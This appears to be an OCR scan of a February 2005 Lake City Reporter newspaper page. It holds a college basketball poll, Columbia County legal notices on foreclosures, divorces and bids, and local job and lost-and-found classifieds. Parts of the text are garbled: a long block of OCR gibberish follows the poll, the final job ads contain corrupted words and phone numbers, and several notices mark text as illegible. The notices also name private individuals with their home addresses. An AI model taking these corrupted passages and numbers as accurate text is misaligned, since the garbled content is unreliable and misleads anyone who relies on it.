No. 21 Oklahoma at Kansas State, 1:30 p.m.
No. 22 Maryland at Virginia, 3:30 p.m.
No. 23 Charlotte at Tulane, 8 p.m.
No. 24 Cincinnati vs. Alabama-Birmingham, 4 p.m.

USA Today/ESPN poll

The top 25 teams in the USA Today-ESPN men's college basketball poll:

(Record, Pts, Pvs)
1. Illinois (31) 25-0 775 1
2. Kansas 20-1 735 3
3. Kentucky 19-2 681 5
4. North Carolina 20-3 671 2
5. Wake Forest 21-3 669 6
6. Boston College 20-1 604 4
7. Oklahoma State 19-3 584 10
8. Duke 18-3 541 8
9. Syracuse 22-3 536 7
10. Michigan State 17-4 482 12
11. Arizona 21-4 477 13
12. Louisville 21-4 426 9
13. Washington 20-4 365 11
13. Utah 21-3 365 15
15. Pittsburgh 17-4 352 15
16. Gonzaga 19-4 297 17
17. Alabama 19-4 284 19
18. Connecticut 15-6 265 14
19. Pacific 20-2 191 24
20. Wisconsin 16-6 138 21
21. Cincinnati 18-6 103 20
22. Oklahoma 17-6 92 18
23.
Charlotte 17-4 69 - 24. Florida 15-6 59 - 25. Texas Tech 15-6 49 23 Others receiving votes: Maryland 48; Texas 40; DePaul 34; Wichita State 20; Villanova 19; Georgetown 16; Old Dominion 15; Southern Illinois 15; UAB 12; Notre Dame 8; Mississippi State 7; Nevada 7; George Washington 6; Georgia Tech 4; Oregon State 4; Air Force 3; Iowa State 2; Miami (Ohio) 2; Western Kentucky 2; Vermont 1. of Gas with I ree Maj or Rep El 1W I- 12/1 Nationwide Warr i El 4 LAKE CITY REPORTER, TUESDAY, FEBRUARY 15, 2005 3B >1 e^3 -dm - I u~ft I -- a -4 4 4- -.: q= 4lo- w bpp404 ~ ,.,- - do *.4 r *MOM e w two 74ip 1ow -- "Copyrighted M ^*.Syndicated Co ^Available from Commercial VjAM t n01 GNO I A,- - . material intent 5, 4'a Ai News Providers", 1" I : U N , - m 0,840 *I i i.A 401-400-b a Aodw Um o b d -bw -n ow Ib 4m 40 * 000 * -~ .. * ~ 4 0000 * AM *AM 0 mob ASM - 0 0 0 * 0e S * 401Mas a ~ ~ 4ma. 0- 0 00 0 0.0 as a 5* 0 *'.0 ~ 0 a *m& 4 0*41b. 0100 am o 0 af itam m 0m a w .4 *Me * - * ..- 0 0 tb Ow ~L7 .o 0- 40 4w Q aMe 0 o g * ** * 4b IU and 41b 4000 qD iYaot LAKE CITY REPORTER, TUESDAY, FEBRUARY 15, 2005 Legal INVITATION TO BID BID NO. 2005-A SURPLUS PORTABLE BUILDINGS please be advised that Columbia County desires to accept sealed bids on four sur- plus portable buildings. Bids will be ac- cepted through 2:00 P.M. on March 9, 2005. All bids submitted shall be on the form provided. Specifications and bid forms may be ob- tained by contacting the office of the Board of County Commissioners, Co- lumbia County, 135 NE Hernando Street Room 203, Lake City, Florida 32056- 1529 or by calling (386) 758-1005. Co- lumbia County reserves the right to re- ject any/and all bids to accept the bid in the County's best interest. Dated this 16th day of, February 2005. Columbia County Board of County Commissioners Jennifer Flinn Chair Person February 16, 23, 2005 IN THE CIRCUIT COURT OF THE THIRD JUDICIAL CIRCUIT IN AND FOR COLUMBIA COUNTY, FLORI- DA SCIVILACTION CASE NO. 
2004-526-CA
DIVISION
MATRIX FINANCIAL SERVICES CORPORATION, Plaintiff, vs. JORGE L. GUERRA, et al., Defendant(s).
NOTICE OF FORECLOSURE SALE
NOTICE IS HEREBY GIVEN pursuant to a Final Judgment of Mortgage Foreclosure dated February 08, 2005 and entered in Case No. 2004-526-CA of the Circuit Court of the THIRD Judicial Circuit in and for COLUMBIA County, Florida, wherein MATRIX FINANCIAL SERVICES CORPORATION is the Plaintiff and JORGE L. GUERRA; KENDILYN S. GUERRA; CITIFINANCIAL EQUITY SERVICES, INC.; TENANT #1 N/K/A CHARLENE COUCHAN are the Defendants, I will sell to the highest and best bidder for cash at the FRONT STEPS OF THE COLUMBIA COUNTY COURTHOUSE at 11:00 AM on the 9th day of March, 2005, the following described property as set forth in said Final Judgment:
LOT 13, PINE HAVEN, ACCORDING TO THE PLAT THEREOF, AS RECORDED IN PLAT BOOK 6, PAGES 138 THROUGH 139, OF THE PUBLIC RECORDS OF COLUMBIA COUNTY, FLORIDA. TOGETHER WITH A MOBILE HOME LOCATED THEREON AS A PERMANENT FIXTURE AND APPURTENANCE THERETO.
A/K/A Rural Route 27, Box 248013, Lake City, FL 32024
WITNESS MY HAND and the seal of this Court on February 9th, 2005.
P. DEWITT CASON, Clerk of the Circuit Court
by: -s- J. MARKHAM, Deputy Clerk
01550887
February 15, 22, 2005

IN THE CIRCUIT COURT OF THE THIRD JUDICIAL CIRCUIT, IN AND FOR COLUMBIA COUNTY, FLORIDA
Case No: 05-40-DR
Division:
JUSTINE NICOLE SLOCUM, Petitioner, and WILLIAM JOSEPH PATTON, Respondent.
NOTICE OF ACTION FOR DISSOLUTION OF MARRIAGE
TO: WILLIAM JOSEPH PATTON, 4115 Alpine Dr., Gainesville, FL
YOU ARE NOTIFIED that an action has been filed against you and that you are required to serve a copy of your written defenses, if any, to it on JUSTINE NICOLE SLOCUM, whose address is 816 NW [illegible] Ave., Gainesville, FL 32609, on or before 2/20/05, and file the original with the clerk of this Court at P.O. Box 2069, Lake City, FL 32056, before service on Petitioner or immediately thereafter. If you fail to do so, a default may be entered against you for the relief demanded in the petition.
Copies of all court documents in this case, including orders, are available at the Clerk of Circuit Court's office. You may review these documents upon request. You must keep the Clerk of the Circuit Court's office notified of your current address. (You may file Notice of Current [text cut off in original].)
Dated January 20, 2005
P. DEWITT CASON, CLERK OF THE CIRCUIT COURT
by: -s- MARIA BONESIO, Deputy Clerk
I, Paula Huber, a nonlawyer, located at 24602 NW 122 Ave., Alachua, FL 32615, 386-454-2378, helped JUSTINE NICOLE SLOCUM, who is the petitioner, fill out this form.
01550253
January 25, 2005; February 1, 8, 15, 2005

IN THE CIRCUIT COURT OF THE THIRD JUDICIAL CIRCUIT, IN AND FOR COLUMBIA COUNTY, FLORIDA
CASE NO.: 03-595-CA
GREEN TREE SERVICING, LLC f/k/a GREEN TREE FINANCIAL SERVICING CORP., 4625 River Green Parkway, Duluth, GA 30096, Plaintiff, v. WILL E. CRAY, Defendant.
NOTICE OF SALE
NOTICE IS HEREBY GIVEN THAT, pursuant to Plaintiff's Final Judgment of Foreclosure and Re-Establishment of Note entered in the above-captioned action, I will sell the property situated in Columbia County, Florida, described as follows, to wit:
Lot 19, Pine Ridge, according to the map or plat thereof as recorded in Plat Book 4, Pages 102 and 102A, Public Records of Columbia County, Florida. TOGETHER WITH that certain 1997 48 x 24 Springhill Mobile Home: VIN #GAFLV34A/B70324-SH21
at public sale, to the highest and best bidder, for cash, at the Columbia County Courthouse, Lake City, Florida, at 11:00 a.m. on the 9th day of March, 2005.
Clerk of the Circuit Court
By: -s- J. Markham, J. MARKHAM, Deputy Clerk
03524110
February 15, 22, 2005

Legal

IN THE CIRCUIT COURT OF THE THIRD JUDICIAL CIRCUIT, IN AND FOR COLUMBIA COUNTY, FLORIDA
Case No: 05-071-DR
Division:
MARILYN MARIE FAVORITE, Petitioner, and ALAIN CARL LEBRUN, Respondent.
NOTICE OF ACTION FOR PETITION FOR NAME CHANGE (MINOR CHILDREN)
TO: ALAIN CARL LEBRUN, HOLLYWOOD, FLORIDA
YOU ARE NOTIFIED that an action has been filed against you and that you are required to serve a copy of your written defenses, if any, to it on MARILYN MARIE FAVORITO, whose address is 3112 SW HERLONG ST., FT. WHITE, FL 32038, on or before MARCH 4, 2005, and file the original with the Clerk of this Court at 173 [address garbled in original].
P. DEWITT CASON, Clerk of the Circuit Court
by: -s- MARIA BONESIO, Deputy Clerk
01550730
February 8, 15, 22, 2005; March 1, 2005

IN THE CIRCUIT COURT OF THE THIRD JUDICIAL CIRCUIT, IN AND FOR COLUMBIA COUNTY, FLORIDA
CASE NO.: 05-08-CA
GREEN TREE SERVICING, LLC f/k/a GREEN TREE FINANCIAL SERVICING CORP., 1400 Turbine Drive, Rapid City, SD 57703, Plaintiff, v. WILLIE R. BARNER; DEBORAH BARNER; and STATE EMPLOYEES CREDIT UNION, Defendants.
NOTICE OF ACTION
TO: WILLIE R. BARNER, DEBORAH BARNER
YOU ARE NOTIFIED that a foreclosure action has been filed against you on the following described property:
Lot 1, Block C, NEW HOPE ESTATES, UNIT 2, a subdivision according to the plat thereof recorded in Plat Book [number cut off], Page 93, Public Records of Columbia County, Florida. TOGETHER WITH that certain 1996 [make garbled] Mobile Home, Serial No. SHSI02S-4GL&R,
and you are required to file a written response with the Court and serve a copy of your written defenses, if any, to it on Timothy D. Padgett, Plaintiff's attorney, whose address is 2810 Remington Green Circle, Tallahassee, FL 32308, at least thirty (30) days from the date of first publication or on or before March 2[?], 2005, and file the original with the clerk of this court either before service on Plaintiff's attorney or immediately thereafter; otherwise, a default will be entered against you for the relief demanded in the complaint.
Dated this 9th day of February, 2005.
CLERK OF COURT
By: -s- J. Markham, J. MARKHAM, Deputy Clerk
01550894
February 15, 22, 2005

Registration of Fictitious Names
We the undersigned, being duly sworn, do hereby declare under oath that the names of all persons interested in the business or profession carried on under the name of: The Appraisal Store, at 490 NW Spring Hollow Blvd., Lake City, FL 32055, Contact Phone Number: 386-752-321[?], and the extent of the interest of each is as follows: NAME: Douglas G. Vodnansky. EXTENT OF INTEREST: 100%.
by: -s- Douglas G. Vodnansky
STATE OF FLORIDA, COUNTY OF COLUMBIA
Sworn to and subscribed before me this 10th day of February, A.D. 2005 by: -s- Kathleen A. Riotto, Notary
03524105
February 15, 2005

Legal

IN THE CIRCUIT COURT OF THE THIRD JUDICIAL CIRCUIT IN AND FOR COLUMBIA COUNTY, FLORIDA
CASE NO: 05-06-CA
MORTGAGE ELECTRONIC REGISTRATION SYSTEMS, INC., a Nominee for Novastar Mortgage, Inc., Plaintiff, vs. KURT STEPHEN CONKLIN a/k/a KURT S. CONKLIN, UNKNOWN SPOUSE OF KURT STEPHEN CONKLIN a/k/a KURT S. CONKLIN, MORTGAGE ELECTRONIC REGISTRATION SYSTEMS, INC. (MIN 100080100010661790), STATE OF FLORIDA DEPARTMENT OF REVENUE, YVONNE M. PEISEL-GALLEGOS, UNKNOWN TENANT(S) IN POSSESSION #1 and #2, et al., Defendant(s).
NOTICE OF ACTION
TO: YVONNE M. PEISEL-GALLEGOS, last known residence: RR 13, Box 2064, Lake City, FL 32055, or 1817 SE Beadie Drive, Lake City, FL 32025, current residence unknown, if living, and ALL OTHER UNKNOWN PARTIES, including, if a named Defendant is deceased, the personal representatives, the surviving spouse, heirs, devisees, grantees, creditors, and all other parties claiming by, through, under or against that Defendant, and all claimants, persons or parties, natural or corporate, or whose exact legal status is unknown, claiming under any of the above named or described Defendants.
YOU ARE HEREBY NOTIFIED that an action to foreclose a mortgage on the following property located in Columbia County, Florida:
LOT 16, SPRINGFIELD ESTATES, PHASE 2, A SUBDIVISION, ACCORDING TO THE PLAT THEREOF AS RECORDED IN PLAT BOOK 6, PAGE 27, OF THE PUBLIC RECORDS OF COLUMBIA COUNTY, FLORIDA,
has been filed against you and you are required to serve a copy of your written defenses, if any, to it on Brian L. Rosaler, Esquire, Popkin & Rosaler, P.A., Plaintiff's attorney, at 10 Fairway Drive, Suite 302, Deerfield Beach, FL 33441, within 30 days of the first date of publication of this notice, and file the original with the clerk of this court (P.O. Box 2069, Lake City, FL 32056) either before March 21, 2005 on Plaintiff's attorney or immediately thereafter; otherwise a default will be entered against you for the relief demanded in the complaint or petition.
Dated on February 9, 2005.
P. DEWITT CASON, As Clerk of the Court
By: -s- J. Markham, J. MARKHAM, As Deputy Clerk
03524108
February 15, 22, 2005

REQUEST FOR QUALIFICATIONS FOR ARCHITECTURAL SERVICES
RFQ#: LCCC 3-001-05
The Board of Trustees of Lake City Community College (LCCC), Lake City, Florida 32025, in compliance with Section 287.055, Florida Statutes, and State Requirements for Educational Facilities (SREF), is accepting applications from architectural firms to provide services necessary to complete various LCCC projects/activities. Listed below are representative projects/activities for which the selected firm may be required to provide [text garbled in original] criteria package as specified by Section 287.055, F.S.
1. Develop a strategic, long-range Facilities Master Plan.
2. Architectural and Engineering services for renovation of buildings [number garbled] and #21.
3. Facilities Program Management Services.
4. Five-Year Educational Plant Survey.
All parties interested in being considered for providing the described services may request an Architectural Services Response package from:
Bill Brown, Director of Purchasing, Lake City Community College, 149 SE College Place, Lake City, Florida 32025, (386) 754-4360
Response packages may also be obtained via e-mail by sending a request to: brownb@lakecitycc.edu
Five (5) copies of the Response package, of which at least one (1) copy will have the original signature, must be received in the Purchasing Office located in Room 138, Building 001 on the Main Campus of Lake City Community College no later than 2:00 PM, March 7, 2005. Responses received after that time will not be considered for this RFQ. Responses via facsimile, email or any other media will not be accepted.
On March 15, 2005 a committee comprised of Lake City Community College personnel and/or consultants will meet in Building 001, Room 144 to evaluate the responses. The RFP opening activity and the RFP evaluation meeting are open to the public. Any person requiring special accommodations for these meetings should immediately notify the Director of Purchasing/Fiscal Reports at (386) 754-4360.
Lake City Community College Board of Trustees
Charles W. Hall, President
01550897
February 13, 15, 16, 2005

Dial-A-Pro Reporter Service Directory / Classified

Furniture: DOUBLE OAK Rocker, $100. 386-752-9500
FREE CLEANUP: Pick up of unwanted metals, tin, scrap vehicles. 386-755-0133. We Recycle.
Land Services

Legal: Public Auction
1995 Dodge, VIN 1B7FL26X1SW924254
1999 Ford, VIN 1FMRU17L0XLC11088
To be held at: Jim's Auto Service LLC, 2[?]5 SW Main Blvd., Lake City, FL 32025
Date of Sale: Wednesday, March 02, 2005. Time of Sale: 10:00 AM
01550739
February 14, 2005

Personal Merchandise: 4 line minimum, $2.55 per line. Add an additional $1.00 per ad for each Wednesday insertion.
Number of Insertions / Per-Line Rate:
1-3: 1.65
4-6: 1.50
7-13: 1.45
14-23: 1.20
24 or more: .99
Add an additional $1.00 per ad for each Wednesday insertion.
Limited to service type advertising only. 4 lines, one month: $60.00; $9.50 each additional line. Add an additional $1.00 per ad for each Wednesday insertion.
Ad Errors: Please read your ad on the first day of publication. We accept responsibility for only the first incorrect insertion, and only the charge for the ad space in error. Please call 755-5440 immediately for prompt correction and billing adjustments.
Cancellations: Normal advertising deadlines apply for cancellations. You can call us at 755-5440, Monday through Friday from 8:00 a.m. to 5:00 p.m. Some people prefer to place [text garbled in original].
Deadlines: Thurs., 10:00 a.m.; Fri., 10:00 a.m.; Fri., 10:00 a.m. Fax/Email by: Mon., 9:00 a.m.; Mon., 9:00 a.m.; Wed., 9:00 a.m.; Thurs., 9:00 a.m.; Fri., [time garbled].
...Federal, State or local laws regarding the prohibition of discrimination in employment, housing and public accommodations. Standard abbreviations are acceptable; however, the first word of each ad may not be abbreviated.
Billing Inquiries: Call 755-5440. Should further information be required regarding payments or credit limits, your call will be transferred to the accounting department.
In Print and On Line: Homes, Acreage, Commercial. North Florida [remainder of advertisement illegible].

Legal

IN THE CIRCUIT COURT OF THE THIRD JUDICIAL CIRCUIT OF FLORIDA, IN AND FOR COLUMBIA COUNTY
CIVIL DIVISION
CASE NO.: 04-516-CA
FIRST NATIONAL ACCEPTANCE COMPANY, Plaintiff, vs. JEFFREY D. SHELTON AND LORA LYNN SHELTON, DEANNA K.
JOHNSON, TRUSTEE OF THE DEANNA K. JOHNSON TRUST, and UNKNOWN TENANTS/OWNERS, Defendants.
NOTICE OF SALE
Notice is hereby given, pursuant to Final Judgment of Foreclosure for Plaintiff entered in this cause on February 2, 2005, in the Circuit Court of Columbia County, Florida, I will sell the property situated in Columbia County, Florida described as:
A PART OF THE SE 1/4 OF THE SE 1/4 OF SECTION 10, TOWNSHIP 7 SOUTH, RANGE 17 EAST, BEING MORE PARTICULARLY DESCRIBED AS FOLLOWS: BEGIN AT THE NORTHEAST CORNER OF THE SE 1/4 OF THE SE 1/4 OF SAID SECTION 10 AND RUN SOUTH 2° 40' 08" EAST ALONG THE EAST LINE OF SAID SECTION 10, 717.02 FEET; THENCE SOUTH 88° 23' 50" WEST, 200.00 FEET; THENCE NORTHWESTERLY ALONG THE ARC OF A CURVE TO THE LEFT HAVING A RADIUS OF 50.00 FEET AND INCLUDED ANGLE OF 143° 07' 48" FOR AN ARC DISTANCE OF 124.90 FEET; THENCE SOUTH 88° 23' 50" WEST, 23.48 FEET; THENCE NORTH 2° 40' 08" WEST, 687.02 FEET TO THE NORTH LINE OF SAID SE 1/4 OF THE SE 1/4 OF THE SE 1/4; THENCE NORTH 88° 23' 50" EAST, 312.92 FEET TO THE POINT OF BEGINNING. ALSO KNOWN AS: LOT 15, DOWNING ACRES, AN UNRECORDED SUBDIVISION, and commonly known as: 819 S.E. Downing Drive,
at public sale, to the highest and best bidder, for cash, AT THE FRONT DOOR OF THE COLUMBIA COUNTY COURTHOUSE, 145 N. HERNANDO STREET, LAKE CITY, FLORIDA, on March 2, 2005 at 11 o'clock P.M.
Dated this 3rd day of February, 2005.
P. DEWITT CASON, Clerk of the Circuit Court
By: -s- J. Markham, J. MARKHAM, Deputy Clerk
01550895
February 15, 22, 2005

Invitation to Bid
Meadors Construction Company, Inc. invites all MBE/WBE Subcontractors to bid the following: Lake City Water Treatment Plant Project. Work consists of excavation, grading, grassing, concrete finishing, rebar, masonry, fencing, mechanical, instrumentation and electrical. Please submit your bid in written form on or before February 17th, 2005, to Meadors Construction Co., Inc. at 5634-1 W. 5th Street, Jacksonville, FL 32254, Estimating Dept.; Ph. 904-695-9290 or Fax 904-695-9272. Plans and Specs may be viewed at the address above or any plan [text garbled in original]. Meadors Construction Co., Inc. is an EOE. Contractor License No. LM00[?]317.
01550869
February 11, 12, 13, 15, 16, 2005

NOTICE OF SHERIFF'S SALE
NOTICE IS HEREBY GIVEN that pursuant to a Writ of Execution issued in the County Court of Columbia County, Florida, on the 26th day of May 2004, in the cause wherein Worldwide Asset Management, L.L.C., assigned to Bank of America, as Plaintiff, and Walter D. Labbi as Defendant, being case number 02-925-SP in said County, I, Bill Gootee, as Sheriff of Columbia County, Florida, have levied upon all the right, title and interest of the Defendant, Walter D. Labbi, in and to the following described Real Property, to-wit:
All blocks G & H of Oakwood S/D & all that piece or parcel of land lying between blocks G & H of Oakwood S/D. 3575 Highway 441 South / Rt. 10 Box 289.
And on the 21st day of March 2005, at the Columbia County Courthouse, 173 N.E. Hernando Avenue, Lake City, Florida, at the hour of 11:00 a.m. or as soon thereafter as possible, I will offer for sale all of the said defendant Walter D. Labbi's right, title and interest in the aforesaid Real Property at public auction and will sell the same subject to taxes, all prior liens, encumbrances and judgments, if any, to the highest bidder for cash. The proceeds to be applied to the payment of costs and satisfaction of the above execution.
BILL GOOTEE, SHERIFF OF COLUMBIA COUNTY, FLORIDA
By: Sergeant Jeff Coleman
In accordance with the Americans with Disabilities Act, persons needing special accommodations to participate in these proceedings should contact the agency sending this notice no later than seven days prior to the proceedings at 173 N.E. Hernando Avenue, Lake City, FL 32055. Telephone (386) 758-1109.
01550906
February 15, 22, 2005; March 1, 08, 2005

REQUEST FOR PROPOSAL FOR BANKING SERVICES
RFP#: LCCC 02-001-05
The District Board of Trustees of Lake City Community College invites financial institutions that are qualified public depositories as defined in Chapter 280, Florida Statutes, and who have a main or full service branch office physically located within 15 miles of the Lake City Community College campus, to provide a proposal for those banking services specified in the Banking Service Proposal package.
All financial institutions interested in being considered for providing banking services for the College may request a Banking Services Proposal package from:
Bill Brown, Director of Purchasing, Lake City Community College, 149 S.E. College Place, Lake City, Florida 32025, (386) 754-4360
Proposal packages may also be obtained via e-mail by sending a request to: brownb@lakecitycc.edu
Five (5) copies of the Response package, of which at least one (1) copy will have the original signature, must be received in the Purchasing Office located in Room 138, Building 001 on the Main Campus of Lake City Community College no later than 2:00 PM, March 10, 2005. Responses received after that time will not be considered for this RFP. Responses via facsimile, email or any other media will not be accepted.
On March 17, 2005 an evaluation committee comprised of Lake City Community College personnel will meet in Building 001, Room 101 to evaluate the responses. The public is invited to attend the RFP opening activity and the committee evaluation meeting. Any person requiring special accommodations for this meeting should immediately notify the Director of Purchasing at (386) 754-4360.
Lake City Community College Board of Trustees
Charles W. Hall, President
01550912
February 13, 15, 16, 2005

020 Lost & Found
FOUND ADULT pet rabbit. Call to identify.
386-752-3764
FOUND RING, Winn Dixie, Lake City. 386-623-5952
LOST CAT: neutered male, domestic med. hair, gray tabby. Missing since 1/10, around 245A area. AVID micro-chip. Loved & missed; please call 386-365-3449
Lost small brown Poodle, "Sparky". Hwy 47 area. 386-755-1893
WWII Vet lost cane downtown: stag handle, carved snake. 755-7284

CHILD CARE WORKER: M/F, hrs. 6am-6pm. Call 752-4411 or fax qualifications to: 752-0740. Must have clean background check.
550107
NEED A JOB? Get a real estate license. Call 755-40410 for info or reach us @ N. FL Real Estate [text garbled in original]. Equal Opportunity Employer.
01550599
THE LAKE CITY REPORTER is currently looking for an independent newspaper carrier for the Downtown Lake City area. Deliver the Reporter in the early morning hours Tuesday through Sunday. No delivery on Mondays. Carrier must have dependable transportation. Stop by the Reporter today to fill out a contractor's inquiry form. No phone calls!

100 Job Opportunities
01550710
SOUTHEAST REGIONAL DRIVERS: Davis Express, Starke, FL, is looking for drivers to run SE. Requires Class A CDL w/hazmat. 98% miles in Fla., Ga., Tenn., S.C. & Alabama. 1 yr. exp.: .34 cpm; 2 yrs. exp.: .35 cpm; 3 yrs. exp.: .36 cpm. 100% lumper reimbursement. $500 sign-on bonus. Safety bonus. Guaranteed hometime. Health, Life, Dental & Disability Ins. avail. 401K available. Call 1-800-874-4270 #6.
01550809
PAYROLL ADMINISTRATOR: Challenging position with the largest sailboat manufacturer in the USA. Immediate opening for a person with at least 2 years experience with a computerized payroll system. Experience with Excel a must. Other program knowledge includes Crystal Reports, Abra, and Unitime. Employer offers an excellent fringe benefit package, including family health care, paid vacations and paid holidays, and a 401K Plan. Salary is negotiable with experience. Please apply in person at Hunter Marine, Hwy 441 in Alachua.
01550862
IMMEDIATE OPENING in the Production/Editorial departments. Candidates must be detail oriented and have experience in Quark XPress, Photoshop, and using Macintosh computers. Good typing skills a plus. Experience in Acrobat and Acrobat Distiller also helpful. Regular shift will be Tues.-Sat., 3 p.m. to 12 midnight. Competitive hourly rate. Candidates are asked to send all resumes to Dave Kimler, c/o Lake City Reporter, 180 E. Duval St., Lake City, FL 32055, or email to: dkimler@lakecityreporter.com. If samples of work are available, please include with submitted resume. Only qualified candidates will be called for interview.

Full Health Insurance, 401K, Uniforms, Paid Vacation. Late Model Equipment. Apply in person Mon.-Fri. between 3pm and 6pm @ Johnson & Johnson Inc., 1607 US 90 East, Madison, Florida 32340. Contact person: Ronnie Blanton.

EXP. CDL-A DRIVERS: NOW IS THE TIME. LET'S TALK!! Mesilla Valley Transportation, 1-800-944-4544.

100 Job Opportunities
01550876
Plumbers, UNIVERSITY OF FLORIDA: The University of Florida, Department of Housing and Residence Education, is currently recruiting for three plumbers. Minimum requirements include completion of an approved apprenticeship program in plumbing, or a high school diploma and four years of appropriate experience. Appropriate vocational/technical training may substitute at an equivalent rate for the required experience. These positions maintain and install a variety of plumbing and heating systems and fixtures. Preferred candidates will have knowledge of the procedures and methods for installing, repairing, and maintaining plumbing and heating fixtures and accessories, and be skilled in use of pipe cutters, reamers, threading machines and other specialized tools and equipment. Expected starting salary for these positions is $10.50 hourly; may exceed based on experience. To view application instructions and complete an online resume, please visit [URL omitted in original]. Reference numbers: 29010, 29019, and 31169. The deadline date to apply is February 24, 2005. If an accommodation due to
a disability is needed to apply for this position, please call (352) 392-4621 or the Florida Relay System at (800) 955-8771 (TDD). An Equal Opportunity Institution.

2 PAINTERS needed. Work in town/out of town. Will train. Call Clay: 386-397-5706 or 386-752-8977.

A/C Service Technician, Commercial: Full time, vehicle and benefits. Drug Free, EOE. Mail resume to: Climate Control Mechanical Services, 737 S.W. 57th Ave., Ocala, FL 34474, or call 1-800-546-0085.

Another Way, Inc. is seeking a shelter manager, outreach advocate and various part time positions. Full time positions are available with benefits. Formerly battered women and minorities encouraged to apply. Fax resume to 386-719-2758 by February 18, 2005.

...Ronnie Harvey at 386-752-2583 or fax resume to: 386-752-8724. Liberty National is an EOE. Licensed Agents Welcome.

How can we top being [B]est Call Center [text garbled in original]? ClientLogic, www.clientlogic.com. "The service engine of the new @conomy."

100 Job Opportunities
ACCOUNTING CLERK: Large company is in search of an experienced Accounting Clerk. Qualified candidate must be experienced in AP/AR, Billing and Month-end close procedures. Must be proficient in Word and Excel; good oral/communication skills are a must! Please forward resumes to: Accounting Clerk, P.O. Box 1829, Lake City, FL 32056, ATTN: Diane Polbos.
ACCOUNTING MANAGER, LAKE CITY AREA: MUST HAVE B.A. DEGREE. 3 YEARS WORKING EXP. AS ACCOUNTING SUPERVISOR OR STAFF ACCOUNTING REQUIRED. GREAT GROUND-FLOOR OPPORTUNITY. RESUMES TO: WS4140@EARTHLINK.NET
Addresses wanted immediately! No experience necessary. Work at home. Call toll 405-447-6397.
ALUMINUM SCREEN Room Installers needed. Must have valid driver's license. Call for appt.: 386-755-5779.
Auto Body Technician: High volume, new shop, highest quality. Immediate openings. Excellent annual income. 386-755-4018; 40U[?]@earthlink.net.
DANIEL'S TOWING & Recovery, 386-755-5154. Wanted: Driver. Must have Class A CDL, 25 yrs. or older. Mechanical knowledge a plus. Apply in person ONLY.
Dump Truck Drivers Wanted: Class A or B license. Contact V&J's at 386-497-1080.

100 Job Opportunities
Exp. COOKS: Apply in person. Beef O'Brady's, 857 SW Main Blvd.
Exp. framing carpenters & helpers: Come join a great crew. Must have transportation. Interviews: call 386-623-5057 or 365-8073 before 8pm.
Experienced GA Mechanic: A&P license required, IA helpful. Live Oak. Fax resume to: 386-845-0243.
EXPERIENCED INSULATORS needed. Must have reliable transportation and be able to work overtime. Class D CDL license a plus. Call 386-758-3995 for appt.
Receptionist needed. Must be people oriented w/ exc. phone skills. Apply in person at Still Waters, 507 NW Hall of Fame Dr.
HIRING FOR all positions at the Porter House Grill. Apply in person between 3-5pm Mon., Tue., or Wed. 894 SW Main Blvd., Lake City.
HOTEL SEEKING dependable, friendly employees with smiles. Housekeepers, front desk clerk (must be flexible with outgoing personality), & part time maintenance (must have exp.). Apply in person: Jameson Inn, 285 SW Commerce Drive. No phone calls please.
INDUSTRIAL: FORKLIFT EXPERIENCE, SHIPPING & RECEIVING, LIFTING REQUIRED. 386-755-1991. WAL-STAF PERSONNEL. BACKGRD/DRUG SCREEN REQ.
INSURANCE CSR: Our busy Lake City Agency needs an exp'd CSR, 220 or 440 Licensed. Great pay & benefits. Fax resume to: 727-943-0022 or e-mail to: grubg@brookecorp.com.
MASON OR Mason Apprentice needed. Must have own transportation. Call 386-466-0000.
MYSTERY SHOPPERS NEEDED! Earn while you shop! Call now toll free: 1-888-255-6040, Ext. 13252.
Needed: delivery driver for the Gainesville Sun in Lake City area. Early morning hours, 7 days a week. For info, call Cindy: 352-338-3148.

WORK AT HOME! Be a Medical Transcriptionist: Come to this free, no obligation seminar to find out how, with no previous experience, you can learn to work at home doing medical transcription from audio cassettes dictated by doctors! High demand! Doctors need transcription. Seminars at 7 PM. This ad is your seminar ticket: CLIP OUT AND BRING TO SEMINAR AT 7 PM. Lake City: Quality Inn, 3559 W. US Highway 90, Lake City, Fla. 32055. 2001 Lowe Street, Fort Collins, CO 80525.

...with experience: incredible commissions & bonuses. Qualify for complete benefits package. SUNBELT HONDA: Apply in person Mon.-Fri., 9am-4pm; see Tony. Business attire; come dressed to begin training. Hwy 41 S., Lake City. No phone calls please.

Walt's Live Oak Ford-Mercury: Looking for experienced salespeople or right people with no experience. Will train. Up to 35% commissions. Demo program for salespeople. Health insurance. Great working environment. Paid 3% on F&I. Paid salary during training. Please call Bobby Cogswell at 386-362-1112.

100 Job Opportunities
...one page resume to 386-961-8802.
PART-TIME GRANT FUNDED HOMELESS SERVICES COORDINATOR: This contractual position requires completing grant requirements, attending monthly meetings, correspondence, and advocacy on behalf of the homeless; day to day operation interacting with & assisting clients. Applicant should have good communication skills and knowledge of the social service agencies. Send resume to: 258 NW Burk Avenue, Lake City, FL 32055, or fax to 386-754-5325.
PROFESSIONAL CHILD Care worker with CDA looking to expand into management. Mail resume to P.O. Box 2127, Lake City, FL 32056.
ROUTE DRIVER WANTED: Class B license required. Apply online at [URL omitted in original].
SALES POSITION: MUST HAVE STRONG SALES EXPERIENCE. PLEASE CALL FOR APPT. WAL-STAFF PERSONNEL, 386-755-1991. Drug Screen & Backgrd Req.
Santa Fe Truss: We are currently in need of a Truss Repair Technician. Prior experience preferred. Willing to train individual with similar construction experience. The right candidate will possess strong analytical and communication skills and must be extremely self motivated.
A valid Florida driver's license is required, Job also requires .*casi.,rial heaj. lift- ing and the abili[, to .. ork at <.ai, - ing heights. We offer competitive pay and benefits. DFWP. Qualified applicants should contact us in person only at 410 SW Poe,Springs Rd, High Springs Sante Fe Truss We are'currently hiring truss builderss ard -a.. cre. personnel Prior experience required. We offer qualified indit\ dua.s great production it( bonuses, competia e pay. and benefits DFWVP. SApp', in person onl) at SS\: 410 S Po Spring; Road High Springs. SONNY'S B-B-Q is Now hiring Exp. Managers in Like Citi. Also other Florida locations ai ail Sumbit resume in peron or mail to 10731 SW 66th Ci Ocala. FL 344.17,6 EOE D/F.'\/P SOUTHEASTERN METAL \\elder-> needed. Now taking applicahons in production. ,elding. S"S-$15 per hour call 3S6-75S-7757 SURVEYING Help needed. SEperienced Intrunment Person & E' perenced Draftismni. Call during business hours 38'6-' 5-9,S31 TRAV EL U*S*A E',citingtS Firrin Has 10 Imniedi- ate Openings f':ri sharp Gu.s && Gals Free to travel all major cities & resort areas. Mu_-.t be IS Years of age & older Must be free to start to- da. \\e offer 2 i, ceks paid training. transportation furnished. return guaranteed For inter, ien Call Mr. Kenmore 5 3.%6-152-6262 Wed Fri iUam to 5pm Truck Drivers \\anted CDL ClIa A required 2 years experience Good 